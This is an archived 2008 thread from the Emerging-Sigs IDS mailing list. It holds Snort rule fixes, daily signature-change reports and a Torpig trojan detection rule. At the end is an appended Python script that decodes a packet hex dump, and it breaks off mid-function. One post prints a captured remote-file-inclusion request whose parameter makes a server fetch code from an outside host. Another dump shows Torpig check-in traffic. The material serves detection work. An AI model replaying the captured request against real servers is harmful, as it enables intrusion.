       2407030 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
    -> Added to emerging-web.rules (1):
       #by Stillsecure (stillsecure.com)

[---] Removed non-rule lines: [---]

    -> Removed from emerging-rbn-BLOCK.rules (2):
       # VERSION 77
       # Updated 2008-10-01 18:23:28
    -> Removed from emerging-rbn.rules (2):
       # VERSION 77
       # Updated 2008-10-01 18:23:28
    -> Removed from emerging-sid-msg.map (2):
       2500075 || ET COMPROMISED Known Compromised or Hostile Host Traffic (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2510075 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
    -> Removed from emerging-sid-msg.map.txt (2):
       2500075 || ET COMPROMISED Known Compromised or Hostile Host Traffic (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2510075 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (76) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From dxp2532 at gmail.com Sun Oct 5 19:49:59 2008
From: dxp2532 at gmail.com (dxp)
Date: Sun, 05 Oct 2008 19:49:59 -0400
Subject: [Emerging-Sigs] P2P Software - Pando
In-Reply-To: <48E8CFA5.9020305@jonkmans.com>
References: <1223176289.7169.6.camel@kinta> <48E8CFA5.9020305@jonkmans.com>
Message-ID: <1223250599.6407.0.camel@kinta>

Good catch, sorry about that. Yes, it is on port 80, at least was in my case.

- 
-=[ dxp ]=-
0xA3F3C6E3

On Sun, 2008-10-05 at 10:31 -0400, Matt Jonkman wrote:
> Assuming this is on port 80 primarily, or on high ports?
>
> Thanks dxp!
>
> Matt
>
> dxp wrote:
> > Saw this recently on the wire, belongs to yet another P2P application
> > called Pando (www.pando.com/what).
> > User-Agent: Mozilla/4.0 (Windows; U) Pando/1.9.5.9
> >
> > - 
> >
> > -=[ dxp ]=-
> > 0xA3F3C6E3
> >
> > ------------------------------------------------------------------------
> >
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081005/84c817d7/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081005/84c817d7/attachment.bin

From pppmarinho at gmail.com Mon Oct 6 08:11:12 2008
From: pppmarinho at gmail.com (Pedro Marinho)
Date: Mon, 6 Oct 2008 09:11:12 -0300
Subject: [Emerging-Sigs] Emerging-sigs Digest, Vol 11, Issue 7
In-Reply-To:
References:
Message-ID:

Hello Guys,

I received an attack here, so looking at the payload I wrote this rule because I am quite sure we don't have a rule for this user agent.

payload

comprimento = 256

000 : 47 45 54 20 2F 74 6F 6F 6C 73 2F 73 65 6E 64 5F GET /tools/send_
010 : 72 65 6D 69 6E 64 65 72 73 2E 70 68 70 3F 6E 6F reminders.php?no
020 : 53 65 74 3D 30 26 69 6E 63 6C 75 64 65 64 69 72 Set=0&includedir
030 : 3D 68 74 74 70 3A 2F 2F 37 32 2E 35 32 2E 32 32 =http://72.52.22
040 : 35 2E 31 31 36 2F 7E 68 65 6C 69 72 75 73 2F 63 5.116/~helirus/c
050 : 73 73 2F 6D 65 65 66 2E 74 78 74 3F 3F 3F 3F 3F ss/meef.txt?????
060 : 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 / HTTP/1.1..Acce
070 : 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D pt: */*..Accept-
080 : 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75 73 0D Language: en-us.
090 : 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 .Accept-Encoding
0a0 : 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D : gzip, deflate.
0b0 : 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 72 .User-Agent: Mor
0c0 : 66 65 75 73 20 46 75 63 6B 69 6E 67 20 53 63 61 feus Fucking Sca
0d0 : 6E 6E 65 72 0D 0A 48 6F 73 74 3A 20 ** ** ** 2E nner..Host: ***.
0e0 : ** ** 2E ** ** ** 2E ** ** 0D 0A 43 6F 6E 6E 65 *.*.*..Conne
0f0 : 63 74 69 6F 6E 3A 20 43 6C 6F 73 65 0D 0A 0D 0A ction: Close....

Rule:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET SCAN Morfeus Fucking Scanner UA Detected"; flow:established,to_server; content:"|0d 0a|User-Agent\: Morfeus Fucking Scanner"; classtype:web-application-activity; sid:2008***; rev:1;)

PS: did anyone see this in his/her IDS?

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081006/c9ccf6e1/attachment.html

From pepperjack at afferentsecurity.com Mon Oct 6 08:23:32 2008
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Mon, 06 Oct 2008 07:23:32 -0500
Subject: [Emerging-Sigs] rule defect on 2008628
Message-ID: <20081006072332.ifxvtxx7kkok0cww@mail.afferentsecurity.com>

It needs to escape the colon in the reference URL:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN WSFuzzer Web Application Fuzzing"; flow:to_server,established; content:"/ServiceDefinition HTTP/1.1"; content:"User-Agent\: Python-urllib/"; offset:35; distance:35; classtype:attempted-recon; reference:url,www.owasp.org/index.php/Category\:OWASP_WSFuzzer_Project; sid:2008628; rev:1 ;)

-- 
Framework? I don't need no stinking framework!
----------------------------------------------------------------
@fferent Security Labs: Isolate/Insulate/Innovate
http://www.afferentsecurity.com

From jonkman at jonkmans.com Mon Oct 6 08:54:27 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Mon, 06 Oct 2008 08:54:27 -0400
Subject: [Emerging-Sigs] rule defect on 2008628
In-Reply-To: <20081006072332.ifxvtxx7kkok0cww@mail.afferentsecurity.com>
References: <20081006072332.ifxvtxx7kkok0cww@mail.afferentsecurity.com>
Message-ID: <48EA0A83.4080308@jonkmans.com>

Got it, thanks!

Jack Pepper wrote:
> It needs to escape the colon in the reference URL:
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN
> WSFuzzer Web Application Fuzzing"; flow:to_server,established;
> content:"/ServiceDefinition HTTP/1.1"; content:"User-Agent\: Python-urllib/";
> offset:35; distance:35; classtype:attempted-recon;
> reference:url,www.owasp.org/index.php/Category\:OWASP_WSFuzzer_Project;
> sid:2008628; rev:1 ;)
>
>

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com Mon Oct 6 08:56:39 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Mon, 06 Oct 2008 08:56:39 -0400
Subject: [Emerging-Sigs] Emerging-sigs Digest, Vol 11, Issue 7
In-Reply-To:
References:
Message-ID: <48EA0B07.4090909@jonkmans.com>

We have one for this, but I've simplified it a bit:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB PHP Attack Tool Morfeus F Scanner"; flow:established,to_server; content:"User-Agent\: Morfeus "; nocase; reference:url,www.webmasterworld.com/search_engine_spiders/3227720.htm; classtype:web-application-attack; sid:2003466; rev:4;)

Thanks Pedro!

Matt

Pedro Marinho wrote:
> Hello Guys,
>
> I received an attack here, so looking at the payload I wrote this rule
> because I am quite sure we don't have a rule for this user agent.
>
>
> payload
>
>
> comprimento = 256
>
> 000 : 47 45 54 20 2F 74 6F 6F 6C 73 2F 73 65 6E 64 5F GET /tools/send_
>
> 010 : 72 65 6D 69 6E 64 65 72 73 2E 70 68 70 3F 6E 6F reminders.php?no
>
> 020 : 53 65 74 3D 30 26 69 6E 63 6C 75 64 65 64 69 72 Set=0&includedir
>
> 030 : 3D 68 74 74 70 3A 2F 2F 37 32 2E 35 32 2E 32 32 =http://72.52.22
>
> 040 : 35 2E 31 31 36 2F 7E 68 65 6C 69 72 75 73 2F 63 5.116/~helirus/c
>
> 050 : 73 73 2F 6D 65 65 66 2E 74 78 74 3F 3F 3F 3F 3F ss/meef.txt?????
>
> 060 : 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 / HTTP/1.1..Acce
>
> 070 : 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D pt: */*..Accept-
>
> 080 : 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75 73 0D Language: en-us.
>
> 090 : 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 .Accept-Encoding
>
> 0a0 : 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D : gzip, deflate.
>
> 0b0 : 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 72 .User-Agent: Mor
>
> 0c0 : 66 65 75 73 20 46 75 63 6B 69 6E 67 20 53 63 61 feus Fucking Sca
>
> 0d0 : 6E 6E 65 72 0D 0A 48 6F 73 74 3A 20 ** ** ** 2E nner..Host: ***.
>
> 0e0 : ** ** 2E ** ** ** 2E ** ** 0D 0A 43 6F 6E 6E 65 *.*.*..Conne
>
> 0f0 : 63 74 69 6F 6E 3A 20 43 6C 6F 73 65 0D 0A 0D 0A ction: Close....
>
> Rule:
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET
> SCAN Morfeus Fucking Scanner UA Detected"; flow:established,to_server;
> content:"|0d 0a|User-Agent\: Morfeus Fucking Scanner";
> classtype:web-application-activity; sid:2008***; rev:1;)
>
> PS: did anyone see this in his/her IDS?
>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From pppmarinho at gmail.com Mon Oct 6 09:16:32 2008
From: pppmarinho at gmail.com (Pedro Marinho)
Date: Mon, 6 Oct 2008 10:16:32 -0300
Subject: [Emerging-Sigs] Emerging-sigs Digest, Vol 11, Issue 7
In-Reply-To: <48EA0B07.4090909@jonkmans.com>
References: <48EA0B07.4090909@jonkmans.com>
Message-ID:

Ok Matt, thank you.

2008/10/6, Matt Jonkman :
>
> We have one for this, but I've simplified it a bit:
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB PHP
> Attack Tool Morfeus F Scanner"; flow:established,to_server;
> content:"User-Agent\: Morfeus "; nocase;
> reference:url,www.webmasterworld.com/search_engine_spiders/3227720.htm;
> classtype:web-application-attack; sid:2003466; rev:4;)
>
> Thanks Pedro!
>
> Matt
>
> Pedro Marinho wrote:
> > Hello Guys,
> >
> > I received an attack here, so looking at the payload I wrote this rule
> > because I am quite sure we don't have a rule for this user agent.
> >
> >
> > payload
> >
> >
> > comprimento = 256
> >
> > 000 : 47 45 54 20 2F 74 6F 6F 6C 73 2F 73 65 6E 64 5F GET /tools/send_
> >
> > 010 : 72 65 6D 69 6E 64 65 72 73 2E 70 68 70 3F 6E 6F reminders.php?no
> >
> > 020 : 53 65 74 3D 30 26 69 6E 63 6C 75 64 65 64 69 72 Set=0&includedir
> >
> > 030 : 3D 68 74 74 70 3A 2F 2F 37 32 2E 35 32 2E 32 32 =http://72.52.22
> >
> > 040 : 35 2E 31 31 36 2F 7E 68 65 6C 69 72 75 73 2F 63 5.116/~helirus/c
> >
> > 050 : 73 73 2F 6D 65 65 66 2E 74 78 74 3F 3F 3F 3F 3F ss/meef.txt?????
> >
> > 060 : 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 / HTTP/1.1..Acce
> >
> > 070 : 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D pt: */*..Accept-
> >
> > 080 : 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75 73 0D Language: en-us.
> >
> > 090 : 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 .Accept-Encoding
> >
> > 0a0 : 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D : gzip, deflate.
> >
> > 0b0 : 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 72 .User-Agent: Mor
> >
> > 0c0 : 66 65 75 73 20 46 75 63 6B 69 6E 67 20 53 63 61 feus Fucking Sca
> >
> > 0d0 : 6E 6E 65 72 0D 0A 48 6F 73 74 3A 20 ** ** ** 2E nner..Host: ***.
> >
> > 0e0 : ** ** 2E ** ** ** 2E ** ** 0D 0A 43 6F 6E 6E 65 *.*.*..Conne
> >
> > 0f0 : 63 74 69 6F 6E 3A 20 43 6C 6F 73 65 0D 0A 0D 0A ction: Close....
> >
> > Rule:
> >
> > alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET
> > SCAN Morfeus Fucking Scanner UA Detected"; flow:established,to_server;
> > content:"|0d 0a|User-Agent\: Morfeus Fucking Scanner";
> > classtype:web-application-activity; sid:2008***; rev:1;)
> >
> > PS: did anyone see this in his/her IDS?
> >
> >
> > ------------------------------------------------------------------------
> >
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> --
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081006/b55e271d/attachment.html

From emerging at emergingthreats.net Mon Oct 6 16:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Mon, 6 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081006200008.9DC0E45026@goliath.jonkmans.com>

[***] Results from Oinkmaster started Mon Oct 6 16:00:08 2008 [***]

[+++] Added rules: [+++]

    2008546 - ET TROJAN Downloader.vr Checkin part 1 of 2 (emerging-virus.rules)
    2008627 - ET SCAN Httprecon Web Server Fingerprint Scan (emerging-scan.rules)
    2008628 - ET SCAN WSFuzzer Web Application Fuzzing (emerging-scan.rules)
    2008629 - ET SCAN Wikto Backend Data Miner Scan (emerging-scan.rules)

[///] Modified active rules: [///]

    2003466 - ET WEB PHP Attack Tool Morfeus F Scanner (emerging-web.rules)
    2008415 - ET SCAN Cisco Torch IOS HTTP Scan (emerging-scan.rules)
    2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules)
    2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules)
    2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules)
    2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules)
    2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules)
    2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules)
    2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules)
    2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules)
    2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules)
    2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules)
    2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules)
    2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules)
    2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules)
    2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules)
    2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules)
    2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules)
    2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules)
    2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules)
    2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules)
    2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules)
    2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules)
    2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules)
    2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules)
    2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules)
    2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules)
    2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules)
    2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules)
    2406027 - ET RBN Known Russian Business Network Monitored Domains (28) (emerging-rbn.rules)
    2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules)
    2406029 - ET RBN Known Russian Business Network Monitored Domains (30) (emerging-rbn.rules)
    2406030 - ET RBN Known Russian Business Network Monitored Domains (31) (emerging-rbn.rules)
    2407000 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (1) (emerging-rbn-BLOCK.rules)
    2407001 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (2) (emerging-rbn-BLOCK.rules)
    2407002 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (3) (emerging-rbn-BLOCK.rules)
    2407003 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (4) (emerging-rbn-BLOCK.rules)
    2407004 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (5) (emerging-rbn-BLOCK.rules)
    2407005 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (6) (emerging-rbn-BLOCK.rules)
    2407006 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (7) (emerging-rbn-BLOCK.rules)
    2407007 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (8) (emerging-rbn-BLOCK.rules)
    2407008 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (9) (emerging-rbn-BLOCK.rules)
    2407009 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (10) (emerging-rbn-BLOCK.rules)
    2407010 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (11) (emerging-rbn-BLOCK.rules)
    2407011 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (12) (emerging-rbn-BLOCK.rules)
    2407012 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (13) (emerging-rbn-BLOCK.rules)
    2407013 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (14) (emerging-rbn-BLOCK.rules)
    2407014 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (15) (emerging-rbn-BLOCK.rules)
    2407015 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (16) (emerging-rbn-BLOCK.rules)
    2407016 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (17) (emerging-rbn-BLOCK.rules)
    2407017 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (18) (emerging-rbn-BLOCK.rules)
    2407018 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (19) (emerging-rbn-BLOCK.rules)
    2407019 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (20) (emerging-rbn-BLOCK.rules)
    2407020 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (21) (emerging-rbn-BLOCK.rules)
    2407021 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) (emerging-rbn-BLOCK.rules)
    2407022 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) (emerging-rbn-BLOCK.rules)
    2407023 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) (emerging-rbn-BLOCK.rules)
    2407024 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) (emerging-rbn-BLOCK.rules)
    2407025 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) (emerging-rbn-BLOCK.rules)
    2407026 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) (emerging-rbn-BLOCK.rules)
    2407027 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) (emerging-rbn-BLOCK.rules)
    2407028 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) (emerging-rbn-BLOCK.rules)
    2407029 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) (emerging-rbn-BLOCK.rules)
    2407030 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) (emerging-rbn-BLOCK.rules)

[---] Removed rules: [---]

    2008546 - ET CURRENT_EVENTS Unknown Downloader Checkin part 1 of 2 (emerging.rules)

[+++] Added non-rule lines: [+++]

    -> Added to emerging-rbn-BLOCK.rules (2):
       # VERSION 79
       # Updated 2008-10-05 19:23:05
    -> Added to emerging-rbn.rules (2):
       # VERSION 79
       # Updated 2008-10-05 19:23:05
    -> Added to emerging-sid-msg.map (4):
       2008546 || ET TROJAN Downloader.vr Checkin part 1 of 2
       2008627 || ET SCAN Httprecon Web Server Fingerprint Scan || url,www.computec.ch/projekte/httprecon/
       2008628 || ET SCAN WSFuzzer Web Application Fuzzing || url,www.owasp.org/index.php/Category\:OWASP_WSFuzzer_Project
       2008629 || ET SCAN Wikto Backend Data Miner Scan || url,www.sensepost.com/research/wikto/WiktoDoc1-51.htm
    -> Added to emerging-sid-msg.map.txt (4):
       2008546 || ET TROJAN Downloader.vr
Checkin part 1 of 2 2008627 || ET SCAN Httprecon Web Server Fingerprint Scan || url,www.computec.ch/projekte/httprecon/ 2008628 || ET SCAN WSFuzzer Web Application Fuzzing || url,www.owasp.org/index.php/Category\:OWASP_WSFuzzer_Project 2008629 || ET SCAN Wikto Backend Data Miner Scan || url,www.sensepost.com/research/wikto/WiktoDoc1-51.htm -> Added to emerging-virus.rules (1): #Sig by Daniel Clemens [---] Removed non-rule lines: [---] -> Removed from emerging-rbn-BLOCK.rules (2): # VERSION 78 # Updated 2008-10-04 20:39:29 -> Removed from emerging-rbn.rules (2): # VERSION 78 # Updated 2008-10-04 20:39:29 -> Removed from emerging-sid-msg.map (1): 2008546 || ET CURRENT_EVENTS Unknown Downloader Checkin part 1 of 2 -> Removed from emerging-sid-msg.map.txt (1): 2008546 || ET CURRENT_EVENTS Unknown Downloader Checkin part 1 of 2 -> Removed from emerging.rules (1): #another unknown, soo to be IDd. Sig by Daniel Clemens From dokas at oitsec.umn.edu Tue Oct 7 09:59:12 2008 From: dokas at oitsec.umn.edu (Paul Dokas) Date: Tue, 07 Oct 2008 08:59:12 -0500 Subject: [Emerging-Sigs] Torpig Message-ID: <48EB6B30.1010204@oitsec.umn.edu> We found some torpig traffic here on our network yesterday that was not being caught by any rules. One of my co-workers put together a rule to find this traffic and I tuned it a little. 
Here it is:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg: "TROJAN Torpig Infection"; flow: established,to_server; content:"POST"; content:"HTTP/1.0"; content:"Content-Length: 0"; content:"Connection: close"; classtype:trojan-activity;)

Hits look like this:

000 : 50 4F 53 54 20 2F 43 37 33 39 42 35 43 35 42 45 POST /C739B5C5BE
010 : 33 43 38 35 41 44 2F 41 42 51 51 36 6D 56 6A 4A 3C85AD/ABQQ6mVjJ
020 : 46 63 55 67 30 56 56 62 75 59 48 67 6D 56 56 64 FcUg0VVbuYHgmVVd
030 : 79 30 52 74 6E 63 47 46 6D 46 67 64 32 73 52 30 y0RtncGFmFgd2sR0
040 : 6E 63 77 41 2B 42 2F 31 4E 4D 68 41 68 51 43 4A ncwA+B/1NMhAhQCJ
050 : 51 51 4E 4E 6D 49 57 42 57 46 30 72 36 52 67 6B QQNNmIWBWF0r6Rgk
060 : 4E 4E 30 4A 7A 42 41 57 78 61 6A 56 36 46 6B 34 NN0JzBAWxajV6Fk4
070 : 41 36 30 56 78 42 47 41 63 62 67 42 42 2F 44 52 A60VxBGAcbgBB/DR
080 : 73 49 68 70 4B 41 36 59 65 59 45 45 72 52 43 42 sIhpKA6YeYEErRCB
090 : 43 47 62 4E 6D 4B 6D 51 47 51 67 32 32 45 6D 59 CGbNmKmQGQg22EmY
0a0 : 4E 64 52 64 69 43 51 50 36 4D 6A 56 77 43 30 63 NdRdiCQP6MjVwC0c
0b0 : 48 72 42 46 6D 41 57 55 5A 59 45 42 41 20 48 54 HrBFmAWUZYEBA HT
0c0 : 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 66 69 TP/1.0..Host: fi
0d0 : 62 69 64 6F 2E 63 6F 6D 0D 0A 43 6F 6E 74 65 6E bido.com..Conten
0e0 : 74 2D 4C 65 6E 67 74 68 3A 20 30 0D 0A 43 6F 6E t-Length: 0..Con
0f0 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close..
100 : 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 Content-Type: ap
110 : 70 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D plication/x-www-
120 : 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D form-urlencoded.
130 : 0A 0D 0A ...

I'm sure that this rule can be tuned even more. At this point we're no longer getting any false positives.

Enjoy!

Paul

--
Paul Dokas
dokas at oitsec.umn.edu
======================================================================
Don Juan Matus: "an enigma wrapped in mystery wrapped in a tortilla."
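As an added example (not part of Paul's post or of the Emerging Threats rule set), the Python below decodes the hex dump above back into the raw request and applies the rule's four content checks to it the way Snort treats content options that carry no distance/within modifier: each string is searched independently over the whole payload, so only presence matters, not order or position. A constructed HTTP/1.1 form post with a body is run through the same checks for comparison.

```python
import re

# Hex dump copied from the post above: offset, 16 hex bytes, ASCII column.
TORPIG_HIT = """\
000 : 50 4F 53 54 20 2F 43 37 33 39 42 35 43 35 42 45 POST /C739B5C5BE
010 : 33 43 38 35 41 44 2F 41 42 51 51 36 6D 56 6A 4A 3C85AD/ABQQ6mVjJ
020 : 46 63 55 67 30 56 56 62 75 59 48 67 6D 56 56 64 FcUg0VVbuYHgmVVd
030 : 79 30 52 74 6E 63 47 46 6D 46 67 64 32 73 52 30 y0RtncGFmFgd2sR0
040 : 6E 63 77 41 2B 42 2F 31 4E 4D 68 41 68 51 43 4A ncwA+B/1NMhAhQCJ
050 : 51 51 4E 4E 6D 49 57 42 57 46 30 72 36 52 67 6B QQNNmIWBWF0r6Rgk
060 : 4E 4E 30 4A 7A 42 41 57 78 61 6A 56 36 46 6B 34 NN0JzBAWxajV6Fk4
070 : 41 36 30 56 78 42 47 41 63 62 67 42 42 2F 44 52 A60VxBGAcbgBB/DR
080 : 73 49 68 70 4B 41 36 59 65 59 45 45 72 52 43 42 sIhpKA6YeYEErRCB
090 : 43 47 62 4E 6D 4B 6D 51 47 51 67 32 32 45 6D 59 CGbNmKmQGQg22EmY
0a0 : 4E 64 52 64 69 43 51 50 36 4D 6A 56 77 43 30 63 NdRdiCQP6MjVwC0c
0b0 : 48 72 42 46 6D 41 57 55 5A 59 45 42 41 20 48 54 HrBFmAWUZYEBA HT
0c0 : 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 66 69 TP/1.0..Host: fi
0d0 : 62 69 64 6F 2E 63 6F 6D 0D 0A 43 6F 6E 74 65 6E bido.com..Conten
0e0 : 74 2D 4C 65 6E 67 74 68 3A 20 30 0D 0A 43 6F 6E t-Length: 0..Con
0f0 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close..
100 : 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 Content-Type: ap
110 : 70 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D plication/x-www-
120 : 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D form-urlencoded.
130 : 0A 0D 0A ...
"""

# The four content options of the posted rule. None carries a distance or
# within modifier, so Snort searches for each one independently over the
# whole payload: order and position do not matter, only presence.
RULE_CONTENTS = (b"POST", b"HTTP/1.0", b"Content-Length: 0", b"Connection: close")

HEX_BYTE = re.compile(r"[0-9A-F]{2}")


def parse_hexdump(dump):
    """Rebuild the raw payload from an 'OFF : XX XX ... ASCII' style dump."""
    out = bytearray()
    for line in dump.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[1] != ":":
            continue
        # At most 16 byte columns follow the colon; tokens that are not an
        # uppercase hex pair belong to the ASCII column and are skipped.
        for tok in fields[2:18]:
            if HEX_BYTE.fullmatch(tok):
                out.append(int(tok, 16))
    return bytes(out)


def rule_matches(payload, contents=RULE_CONTENTS):
    """True when every content string occurs somewhere in the payload."""
    return all(c in payload for c in contents)


def request_summary(payload):
    """Split an HTTP request into method, target, version, headers, body size."""
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, version = lines[0].split(b" ", 2)
    headers = {}
    for raw in lines[1:]:
        name, _, value = raw.partition(b":")
        headers[name.strip().decode("ascii")] = value.strip().decode("ascii")
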